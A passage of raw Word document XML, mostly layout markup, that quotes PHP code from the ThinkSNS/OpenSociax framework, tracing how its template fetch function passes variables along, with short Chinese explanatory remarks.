      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="34" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s4373" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.55pt;width:337.5pt;height:67.15pt;z-index:762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298"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>protected</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> function </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>fetch($templateFile='',$charset='utf-8'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>,$contentType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='text/html'</w:t>
                  </w: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display=false) {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 w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">\core\OpenSociax\Action.class.php fetch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数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4308" style="width:337.75pt;height:181.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,3630">
            <v:rect id="_x0000_s4372" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4371" style="position:absolute;left:185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4370" style="position:absolute;left:285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4369" style="position:absolute;left:385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4368" style="position:absolute;left:485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4367" style="position:absolute;left:585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4366" style="position:absolute;left:685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4365" style="position:absolute;left:785;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4364" style="position:absolute;left:885;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4363" style="position:absolute;left:985;top:248;width:5543;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4362" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4361" style="position:absolute;left:185;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4360" style="position:absolute;left:285;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4359" style="position:absolute;left:385;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4358" style="position:absolute;left:485;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4357" style="position:absolute;left:585;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4356" style="position:absolute;left:685;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4355" style="position:absolute;left:785;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4354" style="position:absolute;left:885;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4353" style="position:absolute;left:985;top:574;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4352" style="position:absolute;left:4238;top:574;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4351" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4350" style="position:absolute;left:185;top:900;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4349" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4348" style="position:absolute;left:185;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4347" style="position:absolute;left:285;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4346" style="position:absolute;left:385;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4345" style="position:absolute;left:485;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4344" style="position:absolute;left:585;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4343" style="position:absolute;left:685;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4342" style="position:absolute;left:785;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4341" style="position:absolute;left:885;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4340" style="position:absolute;left:985;top:1226;width:3856;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4339" style="position:absolute;left:4841;top:1226;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4338" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4337" style="position:absolute;left:185;top:1552;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4336" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4335" style="position:absolute;left:185;top:1878;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4334" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4333" style="position:absolute;left:185;top:2204;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4332" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4331" style="position:absolute;left:185;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4330" style="position:absolute;left:285;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4329" style="position:absolute;left:385;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4328" style="position:absolute;left:485;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4327" style="position:absolute;left:585;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4326" style="position:absolute;left:685;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4325" style="position:absolute;left:785;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4324" style="position:absolute;left:885;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4323" style="position:absolute;left:985;top:2530;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4322" style="position:absolute;left:1708;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4321" style="position:absolute;left:1828;top:2530;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4320" style="position:absolute;left:4238;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4319" style="position:absolute;left:4359;top:2530;width:1446;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4318" style="position:absolute;left:5805;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4317" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4316" style="position:absolute;left:185;top:2856;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4315" style="position:absolute;left:1269;top:2856;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4314" style="position:absolute;left:1390;top:2856;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4313" style="position:absolute;left:2956;top:2856;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4312" style="position:absolute;left:3077;top:2856;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4311" style="position:absolute;left:5;top:3119;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4310" type="#_x0000_t75" style="position:absolute;left:185;top:3182;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s4309" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:3625" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="8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assign(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'appCssList',$this-&gt;appCssList);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assign(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'langJsList',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r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>langJsList);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298" w:firstLine="79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Addons::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hook(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'core_display_tpl',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array('tpl'=&gt;$templateFile,'vars'=&gt;$this-&gt;tVar,'char set'=&gt;$charset,'contentType'=&gt;$contentType,'display'</w:t>
                    </w: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=&gt;$display));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fetch($templateFile, $this-&gt;tVar,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$charset, $contentType, $display);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1"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="417" w:right="317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把请求转发给真正的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-80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fetch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="148"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>\core\OpenSociax\functions.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s4201" style="position:absolute;margin-left:80.6pt;margin-top:12pt;width:337.75pt;height:327pt;z-index:7720;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,240" coordsize="6755,6540">
            <v:rect id="_x0000_s4307" style="position:absolute;left:1617;top:245;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4306" style="position:absolute;left:1797;top:488;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4305" style="position:absolute;left:2761;top:488;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4304" style="position:absolute;left:1617;top:751;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4303" style="position:absolute;left:1797;top:814;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4302" style="position:absolute;left:1617;top:1077;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4301" style="position:absolute;left:1797;top:1140;width:5061;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4300" style="position:absolute;left:6858;top:1140;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4299" style="position:absolute;left:6978;top:1140;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4298" style="position:absolute;left:1617;top:1403;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4297" type="#_x0000_t75" style="position:absolute;left:1797;top:1436;width:641;height:259">
              <v:imagedata r:id="rId82" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4296" style="position:absolute;left:2438;top:1436;width:1250;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4295" style="position:absolute;left:3688;top:1436;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4294" style="position:absolute;left:1617;top:1729;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4293" type="#_x0000_t75" style="position:absolute;left:1797;top:1792;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4292" style="position:absolute;left:2197;top:1792;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4291" style="position:absolute;left:2920;top:1792;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4290" style="position:absolute;left:3020;top:1792;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4289" style="position:absolute;left:3120;top:1792;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4288" style="position:absolute;left:1617;top:2055;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4287" type="#_x0000_t75" style="position:absolute;left:1797;top:2118;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4286" style="position:absolute;left:2197;top:2118;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4285" style="position:absolute;left:3522;top:2118;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4284" style="position:absolute;left:3643;top:2118;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4283" style="position:absolute;left:3763;top:2118;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4282" style="position:absolute;left:3884;top:2118;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4281" style="position:absolute;left:1617;top:2381;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4280" type="#_x0000_t75" style="position:absolute;left:1797;top:2444;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4279" style="position:absolute;left:2197;top:2444;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4278" style="position:absolute;left:5571;top:2444;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4277" style="position:absolute;left:5691;top:2444;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4276" style="position:absolute;left:5812;top:2444;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4275" style="position:absolute;left:5932;top:2444;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4274" style="position:absolute;left:1617;top:2707;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4273" type="#_x0000_t75" style="position:absolute;left:1797;top:2770;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4272" style="position:absolute;left:2197;top:2770;width:2892;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4271" style="position:absolute;left:1617;top:3033;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4270" style="position:absolute;left:1797;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4269" style="position:absolute;left:1897;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4268" style="position:absolute;left:1997;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4267" style="position:absolute;left:2097;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4266" style="position:absolute;left:2197;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4265" style="position:absolute;left:2297;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4264" style="position:absolute;left:2397;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4263" style="position:absolute;left:2497;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4262" style="position:absolute;left:2597;top:3066;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4261" style="position:absolute;left:2838;top:3066;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4260" style="position:absolute;left:2938;top:3066;width:450;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4259" style="position:absolute;left:3388;top:3066;width:532;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4258" style="position:absolute;left:3920;top:3066;width:3400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4257" style="position:absolute;left:1617;top:3359;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4256" style="position:absolute;left:1797;top:3422;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4255" style="position:absolute;left:1897;top:3422;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4254" style="position:absolute;left:1997;top:3422;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4253" style="position:absolute;left:2097;top:3422;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4252" style="position:absolute;left:2197;top:3422;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4251" style="position:absolute;left:2297;top:3422;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4250" style="position:absolute;left:2397;top:3422;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4249" style="position:absolute;left:2497;top:3422;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4248" style="position:absolute;left:2597;top:3422;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4247" style="position:absolute;left:3320;top:3422;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4246" style="position:absolute;left:3440;top:3422;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4245" style="position:absolute;left:1617;top:3685;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4244" type="#_x0000_t75" style="position:absolute;left:1797;top:3748;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4243" style="position:absolute;left:2197;top:3748;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4242" style="position:absolute;left:4486;top:3748;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4241" style="position:absolute;left:4586;top:3748;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4240" style="position:absolute;left:4686;top:3748;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4239" style="position:absolute;left:5650;top:3748;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4238" style="position:absolute;left:5771;top:3748;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4237" style="position:absolute;left:5891;top:3748;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4236" style="position:absolute;left:1617;top:4011;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4235" style="position:absolute;left:1797;top:4074;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4234" style="position:absolute;left:1617;top:4337;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4233" style="position:absolute;left:1797;top:4370;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4232" style="position:absolute;left:1897;top:4370;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4231" style="position:absolute;left:1997;top:4370;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4230" style="position:absolute;left:2097;top:4370;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4229" style="position:absolute;left:2197;top:4370;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4228" style="position:absolute;left:2438;top:4370;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4227" style="position:absolute;left:2538;top:4370;width:1200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4226" style="position:absolute;left:1617;top:4663;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4225" type="#_x0000_t75" style="position:absolute;left:1797;top:4726;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4224" style="position:absolute;left:2197;top:4726;width:4579;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4223" style="position:absolute;left:6776;top:4726;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4222" style="position:absolute;left:1617;top:4989;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4221" style="position:absolute;left:1797;top:5052;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4220" style="position:absolute;left:1617;top:5315;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4219" type="#_x0000_t75" style="position:absolute;left:1797;top:5348;width:400;height:259">
              <v:imagedata r:id="rId95" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4218" style="position:absolute;left:2197;top:5348;width:2651;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4217" style="position:absolute;left:4848;top:5348;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4216" style="position:absolute;left:4968;top:5348;width:1205;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4215" style="position:absolute;left:6173;top:5348;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4214" style="position:absolute;left:6273;top:5348;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4213" style="position:absolute;left:6373;top:5348;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4212" style="position:absolute;left:6614;top:5348;width:1200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4211" style="position:absolute;left:1617;top:5641;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4210" type="#_x0000_t75" style="position:absolute;left:1797;top:5674;width:641;height:259">
              <v:imagedata r:id="rId82" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4209" style="position:absolute;left:2438;top:5674;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4208" style="position:absolute;left:1617;top:5967;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4207" type="#_x0000_t75" style="position:absolute;left:1797;top:6030;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4206" style="position:absolute;left:2197;top:6030;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4205" style="position:absolute;left:1617;top:6293;width:6745;height:482" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4204" type="#_x0000_t75" style="position:absolute;left:1797;top:6356;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4203" style="position:absolute;left:2197;top:6356;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4202" type="#_x0000_t202" style="position:absolute;left:1614;top:242;width:6750;height:6535" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="1"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="20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180" w:right="29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fetch($templateFile=''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 xml:space="preserve">,$tvar=array(),$charset='utf-8 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>',$contentType='text/html',$display=false) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="215" w:lineRule="exact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注入全局变量</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:color w:val="333333"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ts</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="1503"/>
                      </w:tabs>
                      <w:spacing w:before="112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global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ab/>
                      <w:t>$ts;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tvar[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'ts'] = $ts;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="388" w:lineRule="auto"/>
